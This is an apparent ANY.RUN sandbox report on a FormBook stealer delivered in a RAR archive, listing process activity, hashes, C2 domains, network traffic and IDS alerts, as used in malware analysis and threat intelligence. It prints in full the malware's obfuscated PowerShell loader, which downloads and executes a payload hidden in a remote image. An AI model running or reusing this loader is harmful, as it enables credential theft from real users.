File name:

YKP_Project0021.tbz

Full analysis: https://app.any.run/tasks/2bd1327f-afb2-4125-97ca-6f30a08d826a
Verdict: Malicious activity
Threats:

FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus.

Analysis date: April 09, 2025, 03:25:13
OS: Windows 10 Professional (build: 19044, 32 bit)
Tags:
arch-scr
stegocampaign
payload
ta558
apt
loader
reverseloader
formbook
xloader
stealer
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

E3CA3FC54C1B999BE862C9BE9AFA678F

SHA1:

C71B2076662EFFDF3FC4FAC42017651A2E9530C0

SHA256:

230410EDB91D66B2D4E1F3B6BF5A267BB77D47856C6ACBFAF8B4E056607C1864

SSDEEP:

24:0Ft4EIwmJPnep0ESyI6alK34cNpTyaLso3M/LsihJkwQuZ7uBdrX4B:0FqEIwY/ep0hyIxlKoNaLNYLXGGZ7u/E

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 5000)
    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 2924)
    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 2924)
    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 2924)
    • STEGOCAMPAIGN has been detected

      • powershell.exe (PID: 1084)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 1084)
    • FORMBOOK has been detected (YARA)

      • dfrgui.exe (PID: 4720)
    • Actions looks like stealing of personal data

      • dfrgui.exe (PID: 4720)
    • FORMBOOK has been detected (SURICATA)

      • WinRAR.exe (PID: 5000)
    • Steals credentials from Web Browsers

      • dfrgui.exe (PID: 4720)
    • Stealers network behavior

      • WinRAR.exe (PID: 5000)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 1084)
  • SUSPICIOUS

    • Executing commands from a ".bat" file

      • mshta.exe (PID: 4124)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • mshta.exe (PID: 4124)
    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 4124)
      • wscript.exe (PID: 2924)
    • Writes binary data to a Stream object (SCRIPT)

      • mshta.exe (PID: 4124)
    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 5000)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 4124)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 1264)
    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 2924)
    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 2924)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1084)
    • Runs WScript without displaying logo

      • wscript.exe (PID: 2924)
    • The process executes VB scripts

      • cmd.exe (PID: 1264)
    • Potential Corporate Privacy Violation

      • wscript.exe (PID: 2924)
      • powershell.exe (PID: 1084)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 2924)
    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 2924)
    • Loads DLL from Mozilla Firefox

      • dfrgui.exe (PID: 4720)
  • INFO

    • Reads Microsoft Office registry keys

      • WinRAR.exe (PID: 5000)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 1084)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 1084)
    • Disables trace logs

      • powershell.exe (PID: 1084)
    • Checks proxy server information

      • wscript.exe (PID: 2924)
      • slui.exe (PID: 5408)
      • powershell.exe (PID: 1084)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 4124)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1084)
    • Checks supported languages

      • RegAsm.exe (PID: 1968)
    • Reads security settings of Internet Explorer

      • dfrgui.exe (PID: 4720)
    • Create files in a temporary directory

      • dfrgui.exe (PID: 4720)
    • Reads the software policy settings

      • slui.exe (PID: 5408)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)

EXIF

ZIP

FileVersion: RAR v5
CompressedSize: 715
UncompressedSize: 1966
OperatingSystem: Win32
ArchivedFileName: YKP_Project0021.hta
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
82
Monitored processes
11
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start #FORMBOOK winrar.exe mshta.exe no specs cmd.exe no specs conhost.exe no specs wscript.exe timeout.exe no specs #STEGOCAMPAIGN powershell.exe conhost.exe no specs regasm.exe no specs #FORMBOOK dfrgui.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
1084"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bt#GE#ZwB1#HI#bw#g#D0#I##n#D##LwBI#GU#aQBi#Fc#ZQBZ#Fk#LwBk#C8#ZQBl#C4#ZQB0#HM#YQBw#C8#Lw#6#HM#c#B0#HQ#a##n#Ds#J#Bm#Gw#aQBy#HQ#aQBs#Hk#I##9#C##J#Bt#GE#ZwB1#HI#bw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#YwBh#GI#bwB0#GE#ZwBl#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GM#Z#Bu#C4#d#Bh#Gc#YgBv#Hg#LgBp#G8#LwBh#HM#cwBl#HQ#cw#v#DY#NwBm#DQ#NQ#5#DQ#Zg#3#GQ#Mw#w#GQ#YQ#w#D##MQ#x#GY#YQ#0#GE#Mg#2#C8#Yg#y#D##Zg#x#DY#MQ#x#C0#NQ#0#DY#Ng#t#DQ#Mg#3#GQ#LQ#5#DI#M##5#C0#O#Bm#DY#ZgBh#DQ#YgBi#DQ#MQ#x#DM#LQ#t#C0#bgBl#Hc#XwBp#G0#YQBn#GU#LgBq#H##Zw#n#Ds#J#Bh#H##ZQBy#Gk#ZQBu#HQ#I##9#C##TgBl#Hc#LQBP#GI#agBl#GM#d##g#FM#eQBz#HQ#ZQBt#C4#TgBl#HQ#LgBX#GU#YgBD#Gw#aQBl#G4#d##7#CQ#YQBw#GU#cgBp#GU#bgB0#C4#S#Bl#GE#Z#Bl#HI#cw#u#EE#Z#Bk#Cg#JwBV#HM#ZQBy#C0#QQBn#GU#bgB0#Cc#L##n#E0#bwB6#Gk#b#Bs#GE#Lw#1#C4#M##n#Ck#Ow#k#HI#ZQBj#HQ#bwBw#Gw#YQBz#HQ#eQ#g#D0#I##k#GE#c#Bl#HI#aQBl#G4#d##u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bj#GE#YgBv#HQ#YQBn#GU#KQ#7#CQ#d#Bo#GE#d#Bj#Gg#ZQBy#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#cgBl#GM#d#Bv#H##b#Bh#HM#d#B5#Ck#Ow#k#G0#aQBk#HM#dQBt#G0#ZQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#H##cwBl#HU#Z#Bv#GQ#aQBz#HQ#YQBu#GM#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bz#GU#ZwBt#GU#bgB0#GU#YwB0#G8#bQB5#C##PQ#g#CQ#d#Bo#GE#d#Bj#Gg#ZQBy#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#bQBp#GQ#cwB1#G0#bQBl#HI#eQ#p#Ds#J#Bz#G8#cgB0#GE#cwBl#HM#I##9#C##J#B0#Gg#YQB0#GM#a#Bl#HI#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bw#HM#ZQB1#GQ#bwBk#Gk#cwB0#GE#bgBj#GU#KQ#7#CQ#cwBl#Gc#bQBl#G4#d#Bl#GM#d#Bv#G0#eQ#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#HM#bwBy#HQ#YQBz#GU#cw#g#C0#ZwB0#C##J#Bz#GU#ZwBt#GU#bgB0#GU#YwB0#G8#bQB5#Ds#J#Bz#GU#ZwBt#GU#bgB0#GU#YwB0#G8#bQB5#C##Kw#9#C##J#Bt#Gk#Z#Bz#HU#bQBt#GU#cgB5#C4#T#Bl#G4#ZwB0#Gg#Ow#k#Gc#YQBp#G4#cwB0#HI#aQB2#GU#I##9#C##J#Bz#G8#cgB0#GE#cwBl#HM#I##t#C##J#Bz#GU#ZwBt#GU#bgB0#GU#YwB0#G8#bQB5#Ds#J#Bi#Gw#bwB0#HQ#ZQBz#HE#dQBl#C##PQ#g#CQ#d#Bo#GE#d#Bj#Gg#ZQBy#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HM#ZQBn#G0#ZQBu#HQ#ZQBj#HQ#bwBt#Hk#L##g#CQ#ZwBh#Gk#bgBz#HQ#cgBp#HY#ZQ#p#Ds#J#Bw#GE#cgBh#Gc#bwBu#Gk#bQBp#GE#cwBp#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YgBs#G8#d#B0#GU#cwBx#HU#ZQ#p#Ds#J#B2#GE#bgBx#HU#aQBz#Gg#ZQBy#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#c#Bh#HI#YQBn#G8#bgBp#G0#aQBh#HM#aQBz#Ck#Ow#k#H##ZQBy#G0#YQBm#HI#bwB6#GU#bg#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#GY#b#Bp#HI#d#Bp#Gw#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#UgBl#Gc#QQBz#G0#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Qw#6#Fw#VQBz#GU#cgBz#Fw#U#B1#GI#b#Bp#GM#X#BE#G8#dwBu#Gw#bwBh#GQ#cw#n#Cw#JwBn#Gw#bwBi#GE#b#Bp#HM#YQB0#Gk#bwBu#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#GM#ZQBu#HQ#aQBt#G8#cgBn#GE#bgBz#Cc#L##n#DI#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1264"C:\Windows\System32\cmd.exe" /c "C:\Windows\Temp\succours.bat"C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1968"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regasm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
2232\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2924wscript //nologo "C:\Windows\Temp\boughy.vbs"C:\Windows\System32\wscript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4124"C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa5000.43629\YKP_Project0021.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} C:\Windows\System32\mshta.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
3221225547
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\iertutil.dll
4720"C:\Windows\System32\dfrgui.exe"C:\Windows\System32\dfrgui.exe
WinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Drive Optimizer
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\dfrgui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\gdi32.dll
5000"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\YKP_Project0021.tbz.rarC:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
5240\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5408C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
14 733
Read events
14 723
Write events
10
Delete events
0

Modification events

(PID) Process:(5000) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\Windows\System32\mshta.exe.FriendlyAppName
Value:
Microsoft (R) HTML Application host
(PID) Process:(5000) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\Windows\System32\mshta.exe.ApplicationCompany
Value:
Microsoft Corporation
(PID) Process:(5000) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hta\OpenWithProgids
Operation:writeName:htafile
Value:
(PID) Process:(2924) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2924) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2924) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(4720) dfrgui.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(4720) dfrgui.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(4720) dfrgui.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
Executable files
0
Suspicious files
2
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
1264cmd.exeC:\Windows\Temp\boughy.vbstext
MD5:871E4068F304FAAFF6CA9D68B3346BBB
SHA256:927A36AB53372240B510D303E16FFB8D293F00E8F90B7DDACCDFE47B8C8E7FA8
2924wscript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\MPK9MKUN\0[1].txttext
MD5:275D0CA184BCA74F086D6A1D50F70940
SHA256:68F2D89F6B95F4407E38559E01ADE7B07388DAB35FC00E961CB8899F51D9915B
5000WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa5000.43629\YKP_Project0021.htahtml
MD5:A4A8E466EE4CCE669CC039637D626EC7
SHA256:FD3141F160C3E5782F6D2CE06B10F90AF52DD438856295A925820EE0DFE23A96
1084powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1qygdga3.bav.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1084powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:C2DECE0A469AAD5C41FFC7DF2418DE0F
SHA256:80E9968FA91016D2F060CE89EB14650AFD96695294F80B614C4C5FC98E85A3BC
4124mshta.exeC:\Windows\Temp\succours.battext
MD5:E8C287A0AD5FF76045558F74FC7ACB7E
SHA256:054152321E793DA7F72AD2CE0212E5FF526FBC4D9C2702244BA8F0484314894F
1084powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qgtkzvz5.yts.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4720dfrgui.exeC:\Users\admin\AppData\Local\Temp\2rk4577Kbinary
MD5:552A7ECC6075A8DAF86A5AEBDDA850B1
SHA256:D1DB02F5D2D8A640A49CF8A5CBCD2EA044734231FC886E36244BB8C88146269E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
48
TCP/UDP connections
40
DNS requests
15
Threats
19

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5000
WinRAR.exe
POST
405
15.197.240.20:80
http://www.object-58974.shop/2xl8/
unknown
unknown
5000
WinRAR.exe
GET
200
76.223.54.146:80
http://www.baratabetvip.pro/pwua/?DH=oi1iyX0eJUySVPYfbciyukSsYU9mJp3JCcIV6ALwX/TgQoRAIok9GeJkb5t2EnVOE5tP6AQpD9ADOX2RA4a/uXwguWKJ&gnb=Ihk41
unknown
unknown
5000
WinRAR.exe
POST
405
15.197.240.20:80
http://www.object-58974.shop/2xl8/
unknown
unknown
5000
WinRAR.exe
POST
405
15.197.240.20:80
http://www.object-58974.shop/2xl8/
unknown
unknown
5000
WinRAR.exe
POST
405
15.197.240.20:80
http://www.object-58974.shop/2xl8/
unknown
unknown
5000
WinRAR.exe
POST
405
15.197.240.20:80
http://www.object-58974.shop/2xl8/
unknown
unknown
5000
WinRAR.exe
GET
200
15.197.240.20:80
http://www.object-58974.shop/2xl8/?DH=1kRcCIRzyxSFX4TWr5LtoznAXEsuIcF2y42EMn5B0tNOYhwDa8DgbZxIETk3dFpc7WZVqRJqVZqHTQ2eN20bF4G5I4sP&gnb=Ihk41
unknown
unknown
5000
WinRAR.exe
POST
404
162.254.38.217:80
http://www.novage.site/dckh/
unknown
unknown
5000
WinRAR.exe
POST
404
162.254.38.217:80
http://www.novage.site/dckh/
unknown
unknown
GET
304
4.245.163.56:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x86/10.0.19045.4046/0?CH=469&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2924
wscript.exe
23.186.113.60:443
paste.ee
shared
1084
powershell.exe
18.66.192.64:443
cdn.tagbox.io
AMAZON-02
US
unknown
1084
powershell.exe
23.186.113.60:443
paste.ee
shared
3344
slui.exe
40.91.76.224:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5000
WinRAR.exe
76.223.54.146:80
www.baratabetvip.pro
AMAZON-02
US
unknown
5000
WinRAR.exe
15.197.240.20:80
www.object-58974.shop
AMAZON-02
US
unknown
1232
svchost.exe
20.190.160.131:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5000
WinRAR.exe
162.254.38.217:80
www.novage.site
NAMECHEAP-NET
US
unknown
5400
SIHClient.exe
4.245.163.56:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.142
whitelisted
paste.ee
  • 23.186.113.60
shared
cdn.tagbox.io
  • 18.66.192.64
  • 18.66.192.43
  • 18.66.192.72
  • 18.66.192.16
unknown
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted
www.baratabetvip.pro
  • 76.223.54.146
  • 13.248.169.48
unknown
www.object-58974.shop
  • 15.197.240.20
unknown
login.live.com
  • 20.190.160.131
  • 20.190.160.66
  • 40.126.32.76
  • 20.190.160.65
  • 40.126.32.68
  • 20.190.160.17
  • 40.126.32.72
  • 20.190.160.130
whitelisted
www.novage.site
  • 162.254.38.217
unknown
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted
crl.microsoft.com
  • 2.16.164.120
  • 2.16.164.49
whitelisted

Threats

PID
Process
Class
Message
1696
svchost.exe
Misc activity
ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee)
2924
wscript.exe
Potential Corporate Privacy Violation
ET INFO Pastebin-style Service (paste .ee) in TLS SNI
A Network Trojan was detected
SUSPICIOUS [ANY.RUN] VBS is used to run Shell
Misc activity
INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0)
A Network Trojan was detected
PAYLOAD [ANY.RUN] Base64 encoded PE EXE file inside JPEG image
A Network Trojan was detected
PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558)
A Network Trojan was detected
ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2
1084
powershell.exe
Potential Corporate Privacy Violation
ET INFO Pastebin-style Service (paste .ee) in TLS SNI
5000
WinRAR.exe
A Network Trojan was detected
STEALER [ANY.RUN] Formbook HTTP Header
5000
WinRAR.exe
A Network Trojan was detected
STEALER [ANY.RUN] Formbook HTTP Header
No debug info